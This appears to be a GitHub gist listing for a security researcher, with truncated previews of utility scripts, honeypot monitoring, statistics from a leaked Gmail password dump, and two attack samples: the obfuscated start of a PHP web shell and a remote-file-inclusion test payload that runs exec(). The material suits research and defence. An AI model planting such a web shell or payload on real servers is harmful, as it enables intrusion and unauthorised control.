I hereby claim:
- I am felmoltor on github.
- I am felmoltor (https://keybase.io/felmoltor) on keybase.
- I have a public key whose fingerprint is 1485 9C64 36C5 CA4F 236B C04A 990A 3B4D BB7C FB45
To claim this, I am signing this object:
#!/bin/bash | |
if [[ ! -f $1 || $# -ne 2 ]];then | |
echo "Usage: $0 <file> <resultfile>" | |
else | |
resultfile=$2 | |
echo -n "" > $resultfile | |
for line in `cat $1`; do | |
line=$(echo $line | tr -d ' ') | |
if [[ $(echo $line | grep "-"| wc -l) > 0 ]];then |
#################################################### | |
# List all the files recursively under a directory # | |
#################################################### | |
def ls_r_files(path) | |
path.gsub!(/\/+$/,"") | |
if path[-2,2] != "/." and path[-2,3] != "/.." | |
if File.directory?(path) | |
fentries = [] | |
entries = Dir.entries(path) |
Top domains leaked in 5M password dump of Gmail accounts. Mainly gmail.com and yandex.ru, another similar domains that seems like bug in the phishing or keylogger program: | |
4800946 gmail.com | |
123213 yandex.ru | |
608 gmail.com777 | |
338 gmail.com.vn | |
256 gmail.com.br | |
238 gmail.com.au | |
188 gmail.com7777 | |
174 gmail.com.com |
-------------------- | |
---- 1º Million ---- | |
-------------------- | |
Analyzing a file with user, passwords and separator ':' | |
Loading the whole dump file. Be patient... | |
Spliting the dump information... | |
Analycing the password frecuency... | |
Analycing the domains frecuency... | |
Analycing passwords complexity... |
-------------- | |
- 1º Million - | |
-------------- | |
________________ __________ ____ _______ | |
\_ _____/ _ \\______ \ ___ _/_ | \ _ \ | |
| __)/ /_\ \| ___/ \ \/ /| | / /_\ \ | |
| | / | \ | \ / | | \ \_/ \ | |
\__ | \____|__ /____| \_/ |___| /\ \_____ / | |
\/ \/ \/ \/ |
I hereby claim:
To claim this, I am signing this object:
#!/bin/bash | |
# Author: Felipe Molina (@felmoltor) | |
# Date: January 2015 | |
# Purpose: This scripts checks for new binaries captured by kippo and send an email when an attacker drops a new one | |
############################# | |
LASTLS='lastls.txt' | |
CURRENTLS='currentls.txt' |
<?php | |
$language = 'eng'; | |
$auth = 0; | |
$name = ''; // md5 Login | |
$pass = ''; // md5 Password | |
/**************************************************************************************************************************************************************/ | |
error_reporting(0); | |
$rhs = '7b17e9pVsjj89+Rs8h0UHZ8BJhgjLr4Gj++OnfgS3+I4yW4FEqAYECOBejKb97O/SNXdResK2M7u7P7GuxOgu7q6urqquvpNpuPYQd0xB7YztPrteTG39vLFhtW3IM0d2o6ZSF29ctZ7tm6q0Tx7YPbrDd01DctERorWrX6zO4LPVmPmg9lZADIsSmJnzW141GIOLbvvxsDo3a59Xx853W0LVvMhXGaYzZjU2K7dzuSPL9+/D3NPZZ0A3FmeuDA30IcdpabM1c9qz65pzz50aUG2L49pjy/qdCcnF5mvhcxPpoDlHgrDh24Gi0uDQIGz3aOTi9365s7OTObrmrKwYA0AqOHY967pBCDfXlyc1i/hSn1mH3dg0BwQikCLT4g/XO6eX9Qvzw4YKAAAmKGPAczQh3M243FlmAFWkKE3h2qE4PTk/OJmptkzSzH9aXXdTFDdBZim3R+a/SGAqS9fvHyxo49/+XJImSMEB6f0Hcnfb1HRYo/AWKdYCVHGe90dKttpr6f3DVnEyl++qP+MPxWZDswHoqnDs9R2bEh/Wl3fumos4AVP5BXRQMp1aXqXcuBCq5XNvtoQggVPdblQN5tO2XWbw1kup/zzn1dpg//Oc3Gxz+SUSjWF5CkEFSv9Emvu5Ys/lTkZFzRQW0Z+KHPXNZV1XhHygNqF3/7SfwsvXxhzy+qjXg9odDi0baaa3wCW9KymcOPPeQ65DndK7+l6q0z/cH |
<?php | |
// echo "Testing RFI success!"; | |
$e = ''; | |
exec("touch ./bbbbbbbb.txt",$e); | |
?> |
#!/bin/bash | |
# Close the remaining firewall rules opened for users that no longer are connected by SSH | |
# It deletes the iptables rules execpt the ssh (port 22) and all the local connections | |
# Save this script and execute it as root with a crontab every 5 minutes. | |
# Example output of iptables -L -n: | |
# ACCEPT tcp -- 11.22.33.44 0.0.0.0/0 tcp dpt:80 | |
# ACCEPT tcp -- 11.22.33.44 0.0.0.0/0 tcp dpt:443 |